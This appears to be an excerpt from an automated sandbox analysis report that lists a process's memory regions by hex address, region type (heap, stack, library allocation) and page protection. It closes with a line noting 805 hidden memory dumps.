|
||
|
1B0AE000
|
stack
|
page read and write
|
||
|
C05000
|
heap
|
page read and write
|
||
|
1E0000
|
heap
|
page read and write
|
||
|
576D000
|
stack
|
page read and write
|
||
|
1D1C0000
|
heap
|
page read and write
|
||
|
29E6000
|
trusted library allocation
|
page read and write
|
||
|
4479000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10350000
|
trusted library allocation
|
page read and write
|
||
|
4020000
|
heap
|
page read and write
|
||
|
7FFB10170000
|
trusted library allocation
|
page read and write
|
||
|
7A7000
|
heap
|
page read and write
|
||
|
7FFB104C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10420000
|
trusted library allocation
|
page execute and read and write
|
||
|
5AD0000
|
trusted library allocation
|
page read and write
|
||
|
1C10000
|
heap
|
page execute and read and write
|
||
|
7FFB0FF80000
|
trusted library allocation
|
page read and write
|
||
|
14B2000
|
trusted library allocation
|
page read and write
|
||
|
371000
|
unkown
|
page execute read
|
||
|
1B330000
|
unkown
|
page readonly
|
||
|
3E1000
|
stack
|
page read and write
|
||
|
B28E000
|
stack
|
page read and write
|
||
|
18F2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102B5000
|
trusted library allocation
|
page read and write
|
||
|
1640000
|
heap
|
page read and write
|
||
|
3295000
|
trusted library allocation
|
page read and write
|
||
|
4310000
|
heap
|
page read and write
|
||
|
450000
|
heap
|
page read and write
|
||
|
2491000
|
trusted library allocation
|
page read and write
|
||
|
43D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10010000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10200000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1022D000
|
trusted library allocation
|
page read and write
|
||
|
EA0000
|
heap
|
page read and write
|
||
|
1B332000
|
unkown
|
page readonly
|
||
|
1B3BC000
|
heap
|
page read and write
|
||
|
7FFB101A1000
|
trusted library allocation
|
page read and write
|
||
|
AF0E000
|
stack
|
page read and write
|
||
|
7FFB0FF7D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10290000
|
trusted library allocation
|
page read and write
|
||
|
5B00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B313000
|
heap
|
page execute and read and write
|
||
|
7FFB104AC000
|
trusted library allocation
|
page read and write
|
||
|
2673000
|
heap
|
page read and write
|
||
|
48C0000
|
trusted library allocation
|
page read and write
|
||
|
1BB73000
|
heap
|
page execute and read and write
|
||
|
7FFB103D0000
|
trusted library allocation
|
page read and write
|
||
|
1C6BD000
|
stack
|
page read and write
|
||
|
431C000
|
heap
|
page read and write
|
||
|
7FFB104A2000
|
trusted library allocation
|
page read and write
|
||
|
1D09000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10380000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103B0000
|
trusted library allocation
|
page read and write
|
||
|
41A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10220000
|
trusted library allocation
|
page read and write
|
||
|
78F000
|
heap
|
page read and write
|
||
|
7FFB102BB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2700000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10270000
|
trusted library allocation
|
page read and write
|
||
|
1755000
|
heap
|
page read and write
|
||
|
7FFB1011F000
|
trusted library allocation
|
page read and write
|
||
|
5BF0000
|
trusted library section
|
page read and write
|
||
|
1249E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10540000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB102A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10250000
|
trusted library allocation
|
page read and write
|
||
|
1276E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10329000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103D0000
|
trusted library allocation
|
page read and write
|
||
|
2930000
|
trusted library allocation
|
page read and write
|
||
|
308D000
|
stack
|
page read and write
|
||
|
452B000
|
trusted library allocation
|
page read and write
|
||
|
1124000
|
trusted library allocation
|
page read and write
|
||
|
63B0000
|
heap
|
page read and write
|
||
|
2006000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10200000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101A3000
|
trusted library allocation
|
page read and write
|
||
|
8A63000
|
trusted library allocation
|
page read and write
|
||
|
271861A0000
|
unclassified section
|
page readonly
|
||
|
F44000
|
unkown
|
page write copy
|
||
|
631E000
|
stack
|
page read and write
|
||
|
7FFB10100000
|
trusted library allocation
|
page read and write
|
||
|
420D000
|
trusted library allocation
|
page read and write
|
||
|
16C6000
|
heap
|
page read and write
|
||
|
52B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10130000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10250000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103F5000
|
trusted library allocation
|
page read and write
|
||
|
4BDE000
|
stack
|
page read and write
|
||
|
B2CC000
|
stack
|
page read and write
|
||
|
169A000
|
heap
|
page read and write
|
||
|
37D000
|
unkown
|
page readonly
|
||
|
2008000
|
trusted library allocation
|
page read and write
|
||
|
5C10000
|
trusted library allocation
|
page execute and read and write
|
||
|
26E8000
|
heap
|
page read and write
|
||
|
1B364000
|
heap
|
page read and write
|
||
|
7FFB101C7000
|
trusted library allocation
|
page read and write
|
||
|
F54B76B000
|
stack
|
page read and write
|
||
|
1EBC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101BC000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1023D000
|
trusted library allocation
|
page read and write
|
||
|
1E82000
|
trusted library allocation
|
page read and write
|
||
|
45B0000
|
trusted library allocation
|
page read and write
|
||
|
149D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6DE9000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10360000
|
trusted library allocation
|
page read and write
|
||
|
4580000
|
trusted library allocation
|
page read and write
|
||
|
4B80000
|
trusted library allocation
|
page read and write
|
||
|
6DD3000
|
trusted library allocation
|
page read and write
|
||
|
4530000
|
trusted library allocation
|
page execute and read and write
|
||
|
173F000
|
heap
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
F3D000
|
unkown
|
page readonly
|
||
|
16C2000
|
heap
|
page read and write
|
||
|
7FFB10380000
|
trusted library allocation
|
page read and write
|
||
|
64D0000
|
heap
|
page read and write
|
||
|
384000
|
unkown
|
page read and write
|
||
|
2B0E000
|
trusted library allocation
|
page read and write
|
||
|
8F8000
|
heap
|
page read and write
|
||
|
1AF8C000
|
trusted library allocation
|
page read and write
|
||
|
1A8E000
|
stack
|
page read and write
|
||
|
7FFB10187000
|
trusted library allocation
|
page read and write
|
||
|
581000
|
stack
|
page read and write
|
||
|
F30000
|
unkown
|
page readonly
|
||
|
7FFB101CE000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10141000
|
trusted library allocation
|
page read and write
|
||
|
4630000
|
trusted library allocation
|
page read and write
|
||
|
2678000
|
heap
|
page read and write
|
||
|
44F0000
|
heap
|
page read and write
|
||
|
7FFB10580000
|
trusted library allocation
|
page read and write
|
||
|
1120000
|
trusted library allocation
|
page read and write
|
||
|
1B3DE000
|
heap
|
page read and write
|
||
|
2002000
|
trusted library allocation
|
page read and write
|
||
|
130E000
|
stack
|
page read and write
|
||
|
B73000
|
trusted library allocation
|
page read and write
|
||
|
890000
|
heap
|
page read and write
|
||
|
417E000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101DA000
|
trusted library allocation
|
page read and write
|
||
|
5760000
|
trusted library section
|
page read and write
|
||
|
4626000
|
trusted library allocation
|
page read and write
|
||
|
4610000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104B0000
|
trusted library allocation
|
page read and write
|
||
|
268E000
|
heap
|
page read and write
|
||
|
59B0000
|
heap
|
page read and write
|
||
|
42A0000
|
trusted library allocation
|
page read and write
|
||
|
2718623F000
|
heap
|
page read and write
|
||
|
1B0F0000
|
unkown
|
page readonly
|
||
|
6F44000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
trusted library allocation
|
page read and write
|
||
|
58AD000
|
stack
|
page read and write
|
||
|
7FFB10350000
|
trusted library allocation
|
page read and write
|
||
|
326C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10120000
|
trusted library allocation
|
page read and write
|
||
|
8AF000
|
heap
|
page read and write
|
||
|
1920000
|
trusted library allocation
|
page execute and read and write
|
||
|
14B7000
|
trusted library allocation
|
page execute and read and write
|
||
|
B70000
|
trusted library allocation
|
page read and write
|
||
|
31F0000
|
heap
|
page execute and read and write
|
||
|
7FFB101F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10180000
|
trusted library allocation
|
page read and write
|
||
|
1B1AE000
|
stack
|
page read and write
|
||
|
5FFE000
|
stack
|
page read and write
|
||
|
7FFB10113000
|
trusted library allocation
|
page read and write
|
||
|
7FFB1018F000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10390000
|
trusted library allocation
|
page read and write
|
||
|
4516000
|
trusted library allocation
|
page execute and read and write
|
||
|
F54C2FC000
|
stack
|
page read and write
|
||
|
7FFB10036000
|
trusted library allocation
|
page execute and read and write
|
||
|
611E000
|
stack
|
page read and write
|
||
|
7FFB102BD000
|
trusted library allocation
|
page read and write
|
||
|
4632000
|
trusted library allocation
|
page read and write
|
||
|
4B60000
|
trusted library allocation
|
page read and write
|
||
|
6DBD000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102B2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102F0000
|
trusted library allocation
|
page read and write
|
||
|
5F5000
|
heap
|
page read and write
|
||
|
4180000
|
trusted library allocation
|
page read and write
|
||
|
27186190000
|
heap
|
page read and write
|
||
|
42B1000
|
trusted library allocation
|
page read and write
|
||
|
27186A02000
|
trusted library allocation
|
page read and write
|
||
|
7F368000
|
trusted library allocation
|
page execute and read and write
|
||
|
12F9000
|
stack
|
page read and write
|
||
|
4193000
|
heap
|
page read and write
|
||
|
5720000
|
trusted library allocation
|
page read and write
|
||
|
79F000
|
heap
|
page read and write
|
||
|
1AD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB101E9000
|
trusted library allocation
|
page read and write
|
||
|
F54BDFE000
|
unkown
|
page readonly
|
||
|
3FEE000
|
stack
|
page read and write
|
||
|
4500000
|
trusted library allocation
|
page read and write
|
||
|
59AC000
|
stack
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
781000
|
unkown
|
page readonly
|
||
|
1049000
|
heap
|
page read and write
|
||
|
7FFB101C1000
|
trusted library allocation
|
page read and write
|
||
|
473F000
|
stack
|
page read and write
|
||
|
12650000
|
trusted library allocation
|
page read and write
|
||
|
1B368000
|
heap
|
page read and write
|
||
|
B04E000
|
stack
|
page read and write
|
||
|
B14E000
|
stack
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
7FFB10160000
|
trusted library allocation
|
page read and write
|
||
|
1010000
|
heap
|
page read and write
|
||
|
4211000
|
trusted library allocation
|
page read and write
|
||
|
101E000
|
heap
|
page read and write
|
||
|
45B0000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
heap
|
page execute and read and write
|
||
|
7FFB10197000
|
trusted library allocation
|
page read and write
|
||
|
B3CC000
|
stack
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
5DA6000
|
trusted library section
|
page read and write
|
||
|
25E0000
|
heap
|
page read and write
|
||
|
B45000
|
heap
|
page read and write
|
||
|
4832000
|
trusted library allocation
|
page read and write
|
||
|
5BF0000
|
trusted library allocation
|
page read and write
|
||
|
B18E000
|
stack
|
page read and write
|
||
|
4213000
|
trusted library allocation
|
page read and write
|
||
|
3266000
|
trusted library allocation
|
page read and write
|
||
|
477E000
|
stack
|
page read and write
|
||
|
31DA000
|
trusted library allocation
|
page read and write
|
||
|
451C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10046000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB101B9000
|
trusted library allocation
|
page read and write
|
||
|
4519000
|
trusted library allocation
|
page execute and read and write
|
||
|
4A7000
|
stack
|
page read and write
|
||
|
7FFB102E0000
|
trusted library allocation
|
page read and write
|
||
|
1B402000
|
heap
|
page read and write
|
||
|
F44000
|
unkown
|
page read and write
|
||
|
2400000
|
heap
|
page read and write
|
||
|
1652000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10403000
|
trusted library allocation
|
page read and write
|
||
|
700000
|
heap
|
page read and write
|
||
|
7BE000
|
heap
|
page read and write
|
||
|
54DA000
|
stack
|
page read and write
|
||
|
1B20E000
|
heap
|
page read and write
|
||
|
4600000
|
trusted library allocation
|
page read and write
|
||
|
4200000
|
trusted library allocation
|
page read and write
|
||
|
31B0000
|
trusted library allocation
|
page read and write
|
||
|
F46000
|
unkown
|
page readonly
|
||
|
264A000
|
heap
|
page read and write
|
||
|
112D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10193000
|
trusted library allocation
|
page read and write
|
||
|
BFD000
|
stack
|
page read and write
|
||
|
4120000
|
unkown
|
page readonly
|
||
|
1B180000
|
heap
|
page read and write
|
||
|
ADD8000
|
heap
|
page read and write
|
||
|
5AB0000
|
trusted library allocation
|
page read and write
|
||
|
31E0000
|
trusted library allocation
|
page read and write
|
||
|
1490000
|
trusted library allocation
|
page read and write
|
||
|
7FFB103C0000
|
trusted library allocation
|
page read and write
|
||
|
4520000
|
trusted library allocation
|
page read and write
|
||
|
45E5000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10080000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB10107000
|
trusted library allocation
|
page read and write
|
||
|
26CC000
|
heap
|
page read and write
|
||
|
7FFB103B0000
|
trusted library allocation
|
page read and write
|
||
|
3F5E000
|
stack
|
page read and write
|
||
|
7FFB10410000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFB104D0000
|
trusted library allocation
|
page read and write
|
||
|
1610000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102EB000
|
trusted library allocation
|
page read and write
|
||
|
7FFB101E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102F0000
|
trusted library allocation
|
page read and write
|
||
|
433E000
|
stack
|
page read and write
|
||
|
172F000
|
heap
|
page read and write
|
||
|
5AC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10150000
|
trusted library allocation
|
page read and write
|
||
|
48BE000
|
stack
|
page read and write
|
||
|
7FFB10225000
|
trusted library allocation
|
page read and write
|
||
|
1930000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10117000
|
trusted library allocation
|
page read and write
|
||
|
4620000
|
trusted library allocation
|
page read and write
|
||
|
F54C1FE000
|
unkown
|
page readonly
|
||
|
7FFB103F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10210000
|
trusted library allocation
|
page read and write
|
||
|
25AE000
|
stack
|
page read and write
|
||
|
5651000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10305000
|
trusted library allocation
|
page read and write
|
||
|
7FFB102D3000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10210000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10170000
|
trusted library allocation
|
page read and write
|
||
|
210000
|
unkown
|
page readonly
|
||
|
7FFB10340000
|
trusted library allocation
|
page read and write
|
||
|
41AB000
|
trusted library allocation
|
page read and write
|
||
|
4230000
|
trusted library allocation
|
page read and write
|
||
|
1B0B0000
|
trusted library allocation
|
page read and write
|
||
|
370000
|
unkown
|
page readonly
|
||
|
6990000
|
trusted library allocation
|
page read and write
|
||
|
27186200000
|
heap
|
page read and write
|
||
|
2270000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10330000
|
trusted library allocation
|
page read and write
|
||
|
7FFB0FF70000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10070000
|
trusted library allocation
|
page execute and read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
4582000
|
trusted library allocation
|
page read and write
|
||
|
1AF50000
|
trusted library allocation
|
page read and write
|
||
|
F54C0FE000
|
stack
|
page read and write
|
||
|
7FFB10397000
|
trusted library allocation
|
page read and write
|
||
|
FD0000
|
heap
|
page read and write
|
||
|
14A2000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10400000
|
trusted library allocation
|
page read and write
|
||
|
7FFB10570000
|
trusted library allocation
|
page read and write
|
||
|
8F6000
|
heap
|
page read and write
|
||
|
7FFB100F8000
|
trusted library allocation
|
page read and write
|
||
|
7FFB104B0000
|
trusted library allocation
|
page read and write
|
||
|
2412000
|
unkown
|
page readonly
|
||
|
7FFB10160000
|
trusted library allocation
|
page read and write
|
||
|
3F9F000
|
stack
|
page read and write
|
||
|
7A42000
|
trusted library allocation
|
page read and write
|
||
|
55DE000
|
stack
|
page read and write
|
||
|
4250000
|
unkown
|
page readonly
|
||
|
7FFB0FF6D000
|
trusted library allocation
|
page execute and read and write
|
There are 805 hidden memdumps, click here to show them.